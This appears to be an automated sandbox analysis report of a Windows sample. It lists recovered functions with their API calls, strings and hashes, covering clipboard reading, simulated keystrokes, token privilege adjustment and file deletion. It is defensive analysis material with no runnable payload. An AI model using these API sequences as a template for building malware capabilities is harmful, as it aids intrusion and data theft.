                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0041F940
                                                                                • SendMessageW.USER32 ref: 0041F966
                                                                                • _wcsncpy.LIBCMT ref: 0041F9D2
                                                                                • GetKeyState.USER32(00000011), ref: 0041F9F3
                                                                                • GetKeyState.USER32(00000009), ref: 0041FA00
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0041FA16
                                                                                • GetKeyState.USER32(00000010), ref: 0041FA20
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0041FA4F
                                                                                • SendMessageW.USER32 ref: 0041FA72
                                                                                • SendMessageW.USER32(?,00001030,?,0041E059), ref: 0041FB6F
                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0041FB85
                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0041FB96
                                                                                • SetCapture.USER32(?), ref: 0041FB9F
                                                                                • ClientToScreen.USER32(?,?), ref: 0041FC03
                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0041FC0F
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0041FC29
                                                                                • ReleaseCapture.USER32 ref: 0041FC34
                                                                                • GetCursorPos.USER32(?), ref: 0041FC69
                                                                                • ScreenToClient.USER32(?,?), ref: 0041FC76
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0041FCD8
                                                                                • SendMessageW.USER32 ref: 0041FD02
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0041FD41
                                                                                • SendMessageW.USER32 ref: 0041FD6C
                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0041FD84
                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0041FD8F
                                                                                • GetCursorPos.USER32(?), ref: 0041FDB0
                                                                                • ScreenToClient.USER32(?,?), ref: 0041FDBD
                                                                                • GetParent.USER32(?), ref: 0041FDD9
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0041FE3F
                                                                                • SendMessageW.USER32 ref: 0041FE6F
                                                                                • ClientToScreen.USER32(?,?), ref: 0041FEC5
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0041FEF1
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0041FF19
                                                                                • SendMessageW.USER32 ref: 0041FF3C
                                                                                • ClientToScreen.USER32(?,?), ref: 0041FF86
                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0041FFB6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0042004B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                • String ID: @GUI_DRAGID$F
                                                                                • API String ID: 2516578528-4164748364
                                                                                • Opcode ID: a6e0dda4a3f2bf08b44d49d4e1b86703bd020ad9e45ea4d722c2db3bb88378ea
                                                                                • Instruction ID: 48d99a67f1067042350dc37afabe2ddb834c4b453bd33aa741be4649cd50634f
                                                                                • Opcode Fuzzy Hash: a6e0dda4a3f2bf08b44d49d4e1b86703bd020ad9e45ea4d722c2db3bb88378ea
                                                                                • Instruction Fuzzy Hash: 7532DD74604744EFDB10DF28C884BAABBA4FF49354F14062AF699872B1C734DC9ACB59
                                                                                Function 0041AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0041B1CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: %d/%02d/%02d
                                                                                • API String ID: 3850602802-328681919
                                                                                • Opcode ID: f15491df6d7a48c55a29147b0f409ed6f26725c4b4d93a6a090b9679a719c491
                                                                                • Instruction ID: 26d0693ca361f0d76a39fef4b713a1cce811e9c9857141db5e83465a0a87bcfa
                                                                                • Opcode Fuzzy Hash: f15491df6d7a48c55a29147b0f409ed6f26725c4b4d93a6a090b9679a719c491
                                                                                • Instruction Fuzzy Hash: 3F12CE71600208ABEB258F64DC49FEB7BB8FF45710F10412AF919DB2D1DB788982CB59
                                                                                Function 003CEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 003CEB4A
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00423AEA
                                                                                • IsIconic.USER32(000000FF), ref: 00423AF3
                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 00423B00
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00423B0A
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00423B20
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00423B27
                                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00423B33
                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00423B44
                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00423B4C
                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00423B54
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00423B57
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00423B6C
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00423B77
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00423B81
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00423B86
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00423B8F
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00423B94
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00423B9E
                                                                                • keybd_event.USER32(00000012,00000000), ref: 00423BA3
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00423BA6
                                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00423BCD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 4125248594-2988720461
                                                                                • Opcode ID: 843cdc42c5fef60463ca1f0f800077b124ed45b89e99fd4d4e252a7e8f519838
                                                                                • Instruction ID: 8a51d7a6b0fa4fad6798e592097ae6dccece9f59330bb7682442bf98e0256c04
                                                                                • Opcode Fuzzy Hash: 843cdc42c5fef60463ca1f0f800077b124ed45b89e99fd4d4e252a7e8f519838
                                                                                • Instruction Fuzzy Hash: 0431A371F402287BEB205F75AC4AF7F3E7CEB44B50F104026FA05EA1D1D6B46D01AAA8
                                                                                Function 003EACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003EB180
                                                                                  • Part of subcall function 003EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003EB1AD
                                                                                  • Part of subcall function 003EB134: GetLastError.KERNEL32 ref: 003EB1BA
                                                                                • _memset.LIBCMT ref: 003EAD08
                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003EAD5A
                                                                                • CloseHandle.KERNEL32(?), ref: 003EAD6B
                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003EAD82
                                                                                • GetProcessWindowStation.USER32 ref: 003EAD9B
                                                                                • SetProcessWindowStation.USER32(00000000), ref: 003EADA5
                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003EADBF
                                                                                  • Part of subcall function 003EAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003EACC0), ref: 003EAB99
                                                                                  • Part of subcall function 003EAB84: CloseHandle.KERNEL32(?,?,003EACC0), ref: 003EABAB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                • String ID: $H*F$default$winsta0
                                                                                • API String ID: 2063423040-2846944928
                                                                                • Opcode ID: f58ffdf10e522a31d5843191078f90cba2b2ecfa1fdbc5ea2cca69749d08fd6c
                                                                                • Instruction ID: f06c72c29eb57d65e21c5c2b2625953bf949df03cc12e8cd04656a8e641aec15
                                                                                • Opcode Fuzzy Hash: f58ffdf10e522a31d5843191078f90cba2b2ecfa1fdbc5ea2cca69749d08fd6c
                                                                                • Instruction Fuzzy Hash: CD81CE71800699AFDF12DFA5DC49AEEBBB8FF04344F044229F810B61A1D771AE45DB61
                                                                                Function 003F60DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003F5FA6,?), ref: 003F6ED8
                                                                                  • Part of subcall function 003F6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003F5FA6,?), ref: 003F6EF1
                                                                                  • Part of subcall function 003F725E: __wsplitpath.LIBCMT ref: 003F727B
                                                                                  • Part of subcall function 003F725E: __wsplitpath.LIBCMT ref: 003F728E
                                                                                  • Part of subcall function 003F72CB: GetFileAttributesW.KERNEL32(?,003F6019), ref: 003F72CC
                                                                                • _wcscat.LIBCMT ref: 003F6149
                                                                                • _wcscat.LIBCMT ref: 003F6167
                                                                                • __wsplitpath.LIBCMT ref: 003F618E
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003F61A4
                                                                                • _wcscpy.LIBCMT ref: 003F6209
                                                                                • _wcscat.LIBCMT ref: 003F621C
                                                                                • _wcscat.LIBCMT ref: 003F622F
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 003F625D
                                                                                • DeleteFileW.KERNEL32(?), ref: 003F626E
                                                                                • MoveFileW.KERNEL32(?,?), ref: 003F6289
                                                                                • MoveFileW.KERNEL32(?,?), ref: 003F6298
                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 003F62AD
                                                                                • DeleteFileW.KERNEL32(?), ref: 003F62BE
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F62E1
                                                                                • FindClose.KERNEL32(00000000), ref: 003F62FD
                                                                                • FindClose.KERNEL32(00000000), ref: 003F630B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                • String ID: \*.*$p1Wu`KXu
                                                                                • API String ID: 1917200108-2866000061
                                                                                • Opcode ID: d83baea7e59b1571987d49b84b204832ab912755f61ac368c9d96a8445a7a009
                                                                                • Instruction ID: 523ebd74b78989bcf5e9167974c3d99b29f95092071936dc5c3d3fc165dc248f
                                                                                • Opcode Fuzzy Hash: d83baea7e59b1571987d49b84b204832ab912755f61ac368c9d96a8445a7a009
                                                                                • Instruction Fuzzy Hash: AC511E72D0811C6ACB22EBA1DC45DEF77BCAF05300F0905EAE685E7141DB3697498FA4
                                                                                Function 00406B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenClipboard.USER32(0044DC00), ref: 00406B36
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00406B44
                                                                                • GetClipboardData.USER32(0000000D), ref: 00406B4C
                                                                                • CloseClipboard.USER32 ref: 00406B58
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406B74
                                                                                • CloseClipboard.USER32 ref: 00406B7E
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406B93
                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00406BA0
                                                                                • GetClipboardData.USER32(00000001), ref: 00406BA8
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406BB5
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406BE9
                                                                                • CloseClipboard.USER32 ref: 00406CF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                • String ID:
                                                                                • API String ID: 3222323430-0
                                                                                • Opcode ID: 369f53569877ea0fc63863d843867163f50fb3a800b0fa08c129416c62da6024
                                                                                • Instruction ID: 480cf9bedbbd04d6956683308a87fb083aad7e53abe974dc98eb677ce74a51b9
                                                                                • Opcode Fuzzy Hash: 369f53569877ea0fc63863d843867163f50fb3a800b0fa08c129416c62da6024
                                                                                • Instruction Fuzzy Hash: A7519E71604201ABD311EF65DD46FAF77B8AF84B00F01103AF657E62D1DF74E9058A6A
                                                                                Function 003FF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003FF62B
                                                                                • FindClose.KERNEL32(00000000), ref: 003FF67F
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003FF6A4
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003FF6BB
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 003FF6E2
                                                                                • __swprintf.LIBCMT ref: 003FF72E
                                                                                • __swprintf.LIBCMT ref: 003FF767
                                                                                • __swprintf.LIBCMT ref: 003FF7BB
                                                                                  • Part of subcall function 003D172B: __woutput_l.LIBCMT ref: 003D1784
                                                                                • __swprintf.LIBCMT ref: 003FF809
                                                                                • __swprintf.LIBCMT ref: 003FF858
                                                                                • __swprintf.LIBCMT ref: 003FF8A7
                                                                                • __swprintf.LIBCMT ref: 003FF8F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                • API String ID: 835046349-2428617273
                                                                                • Opcode ID: e881e2cd720bc102fa1eb3c660f4cfd4391ee43d87677d5340a9212ab99a0392
                                                                                • Instruction ID: e664faf3c0a8c9e30bce2fa54a15074ce22dc10f9115e15b396252951cc08345
                                                                                • Opcode Fuzzy Hash: e881e2cd720bc102fa1eb3c660f4cfd4391ee43d87677d5340a9212ab99a0392
                                                                                • Instruction Fuzzy Hash: 7FA111B2508344AFC311EB94C885EAFB7ECAF94704F440D2EF695C6151EB34DA49C762
                                                                                Function 00401B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00401B50
                                                                                • _wcscmp.LIBCMT ref: 00401B65
                                                                                • _wcscmp.LIBCMT ref: 00401B7C
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00401B8E
                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00401BA8
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00401BC0
                                                                                • FindClose.KERNEL32(00000000), ref: 00401BCB
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00401BE7
                                                                                • _wcscmp.LIBCMT ref: 00401C0E
                                                                                • _wcscmp.LIBCMT ref: 00401C25
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401C37
                                                                                • SetCurrentDirectoryW.KERNEL32(004639FC), ref: 00401C55
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00401C5F
                                                                                • FindClose.KERNEL32(00000000), ref: 00401C6C
                                                                                • FindClose.KERNEL32(00000000), ref: 00401C7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                • String ID: *.*
                                                                                • API String ID: 1803514871-438819550
                                                                                • Opcode ID: 35aa8576c3bc22e4d5fd7ff52748c958c2b6c4ce0b5b700e132978a7aa840462
                                                                                • Instruction ID: 6ee59fef7a3bbd44c014713f7c0c921800d9b5a0b9fbfd7d273f7a7dc0bc3944
                                                                                • Opcode Fuzzy Hash: 35aa8576c3bc22e4d5fd7ff52748c958c2b6c4ce0b5b700e132978a7aa840462
                                                                                • Instruction Fuzzy Hash: 9F3193329442196BDF14AFB0EC49ADF77AC9F05324F1041B7F911E21E0EB78DA858A6C
                                                                                Function 00401C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00401CAB
                                                                                • _wcscmp.LIBCMT ref: 00401CC0
                                                                                • _wcscmp.LIBCMT ref: 00401CD7
                                                                                  • Part of subcall function 003F6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003F6BEF
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00401D06
                                                                                • FindClose.KERNEL32(00000000), ref: 00401D11
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00401D2D
                                                                                • _wcscmp.LIBCMT ref: 00401D54
                                                                                • _wcscmp.LIBCMT ref: 00401D6B
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401D7D
                                                                                • SetCurrentDirectoryW.KERNEL32(004639FC), ref: 00401D9B
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00401DA5
                                                                                • FindClose.KERNEL32(00000000), ref: 00401DB2
                                                                                • FindClose.KERNEL32(00000000), ref: 00401DC2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                • String ID: *.*
                                                                                • API String ID: 1824444939-438819550
                                                                                • Opcode ID: 2da1ae49b79a6830b2eb3fa6454399b5c7a50efca71587a7d7836ad1ea2539f4
                                                                                • Instruction ID: 2972447949fe614fe8a1904c1d6f1a53954351dab762c03f9b80ded8e2d2acdb
                                                                                • Opcode Fuzzy Hash: 2da1ae49b79a6830b2eb3fa6454399b5c7a50efca71587a7d7836ad1ea2539f4
                                                                                • Instruction Fuzzy Hash: 2131D23290461A6BDF15AFA0EC49ADE37AD9F45320F100567E801B22E0DB78EA458A6C
                                                                                Function 003B7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _memset
                                                                                • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                • API String ID: 2102423945-2023335898
                                                                                • Opcode ID: d262a727b186f1273deb8a2558be7c6502604c6161217ee5feb8d982e467bed5
                                                                                • Instruction ID: 14558b60e159d3c085bd79c1bd17a10cf6d530ad437c08f6e6f8cd1635b94c32
                                                                                • Opcode Fuzzy Hash: d262a727b186f1273deb8a2558be7c6502604c6161217ee5feb8d982e467bed5
                                                                                • Instruction Fuzzy Hash: 0482E171E04229CBCB25CF94C8806EEBBB5FF88314F65816AD915AB741E7349E85CB84
                                                                                Function 0040091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 004009DF
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004009EF
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004009FB
                                                                                • __wsplitpath.LIBCMT ref: 00400A59
                                                                                • _wcscat.LIBCMT ref: 00400A71
                                                                                • _wcscat.LIBCMT ref: 00400A83
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00400A98
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00400AAC
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00400ADE
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00400AFF
                                                                                • _wcscpy.LIBCMT ref: 00400B0B
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00400B4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
